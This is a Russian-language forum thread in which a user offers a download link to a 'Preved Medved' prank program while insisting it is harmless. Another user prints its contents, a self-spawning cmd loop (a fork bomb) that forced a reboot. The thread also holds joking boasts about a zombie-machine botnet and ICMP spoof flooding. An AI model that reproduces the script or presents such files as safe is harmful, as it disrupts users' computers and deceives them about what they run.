Великим поклоникам ПРЕВЕДА от МЕДВЕДА =)
-
<!-- m --><a class="postlink" href="http://www.hotfile.ru/13096/">http://www.hotfile.ru/13096/</a><!-- m -->
Хватаем отселя..Not a virus\troyan\spy-ware\worm\DDoS-Client
Created dy Danko^^ -
данко хватит издеватца -)))) у меня и так червяк бегаит -)))))
-
StormTruper, Атвечаю не червЪ о_О вообще и не вирус и не червь и не спайвара и не реклама и не DDoS клиент... Просто тру прога=)
Прогу то запустил^^ ? -
мне маево червека хватаит -)))) пусть оффтоперы другие жмут =P мне мой хард ешё живым нужен мне 20 фильмов нада закатать на двд -)
-
StormTruper, Ничо с системой не случица=) И с хардом темболее=)
-
данко я проктически некаму недоверяю так что =P эт случием не програмка типа дальнево управления ? -)
-
StormTruper, Слово дайу=) НЕД! Можешь не запускать=) Серьезно говорю... не вирус это.. а зря ты мне не доверяешь... наф мне твой комп админить=) У мя тут на районе уже артилерия из 20 зомбированых тачек=) Скоро будет сокрушающий удар в виде жоскава спуфа ICMP пакетами=) На месный сервак=)
ЗЫ. Прога просто прикол=) Касперским проверь=) -
данко я тебе говарю пока я фильмы(зарплата) незапишу химичить лишнева несобераюсь а антивирусы идут лесом они меня ешё неразу неспасли -))) данко я может доверяю 3~4 пиплам каторых я знаю уже лет 7~10 так что без обид -)) такой я вот недоверчивый зато мая недоверчивость нераз мне задницу спасла так что с ней я нерастанусь =P а програмку ктонить да заюзает =P
-
Это батник. Вот его содержание:
@echo off
:med
title PREVED!!
echo PREDEEEEEEDD!!! KROCAVCEG!! ^^
start preved.cmd
goto medокошики будут бесконечно открываться.
я запустил - пришлось жать на резет :twisted: виртуальная память достигала 2 Гб :twisted: прога тру!
Полезность этой проги просто не знает границ! :twisted: Её создатель внес большой вклад в развитие человечества! :twisted: Жаль, что нет Нобелевской премии по программированию :twisted:
-
мелкий гай(гей)страный вобшем у тебя ник прочесть некак немагу сам выбери как тебя никовать
-
Little Guy, Сам ты батник=) Это КМД(Console Must Die?!)'шка=)
Полезность этой проги просто не знает границ! Её создатель внес большой вклад в развитие человечества! Жаль, что нет Нобелевской премии по программированию
А это типо стеб? ^^ Лови клиент=) Войдешь в мою армию полного 3.14zDoS'а=)
Это не чудо программерской мысли=) А просто стеб над МЕДВЕДом=)
Так что соси бивни ^^ -
StormTruper, Мелкий Гуй :mrgreen: :mrgreen: :mrgreen:
Во имя воизбежания бана он поменял букву "Х" на "Г"...
Смысл не теряеца один ч0рт=) -
guy [gai]
ты в слух что ли форум читаешь? -
у нево ник провацыруещий -))))))))))
-
а если и читаю тебе то что? -) у каждева свои тараканы в голове маи хотябы мне неговорят ники такие регенить -)
-
StormTruper, аватарка провоцирует?)) Lil` Guy - "маленький мальчик". Как хочешь так и понимай
-
Можно даже маленький парень))) но это уже о росте говорит :mrgreen:
-
Sa1ntAnger иди уже заработай пачётную красную карточку может тогда у тебя мозг проснётца
-
Стараюсь :twisted: